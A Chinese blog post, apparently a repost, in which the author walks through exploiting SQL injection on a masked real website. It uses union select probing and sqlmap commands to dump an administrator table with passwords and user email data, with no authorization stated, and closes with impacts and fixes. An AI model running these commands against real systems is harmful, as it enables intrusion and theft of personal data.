不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

某网站纯在SQl注入利用漏洞

url:http://******.com
验证:
1.单引号返回物理路径
2.猜解当前表的列数,16列正确并正常返回,17列返回异常
3.结合union select语句,
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 –+返回3和7,并在图片里面返回12
图片
4.查看其数据库名和数据库版本:
图片
5.使用sqlmap工具
1)爆出其所有库
sqlmap -u “http://******.com/content.php?id=268” –dbs
图片
2)爆出*******2_db库的所有表
sqlmap -u “http://******.com/content.php?id=268” -D *******2_db –tables
图片
3)爆出administrator表的所有列和数据
sqlmap -u “http://******.com/content.php?id=268” -D *******2_db -T administrator –column
sqlmap -u “http://******.com/content.php?id=268” -D *******2_db -T administrator C AddTime,AdminID,AdminName,AdminPassword,ID,isFrozen,LoginTime,UpdateTime -dump
4)再试着爆出enews表的所有列和数据
此表存在2017-2020年用户邮箱数据等敏感信息
另:以上此网站所有表都可使用sqlmap工具得到一些数据信息,在此不一一列举了。
总结:
漏洞可能造成的危害:
1)攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
2)可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。
3)如果网站目录存在写入权限,可以写入网页木马。攻击者进而可以对网页进行篡改,发布一些违法信息等。
4)经过提权等步骤,服务器最高权限被攻击者获取。攻击者可以远程控制服务器,安装后门,得以修改或控制操作系统。
修复建议:
1)使用waf过滤敏感字段,例如mysql函数。
2)建议提交的url是否存在可控字段,若用户修改参数则自动跳转到某页面。

转自:黑白之道

赞(0) 打赏
未经允许不得转载:seo优化_前端开发_渗透技术 » 某网站纯在SQl注入利用漏洞

相关推荐

  • 暂无文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏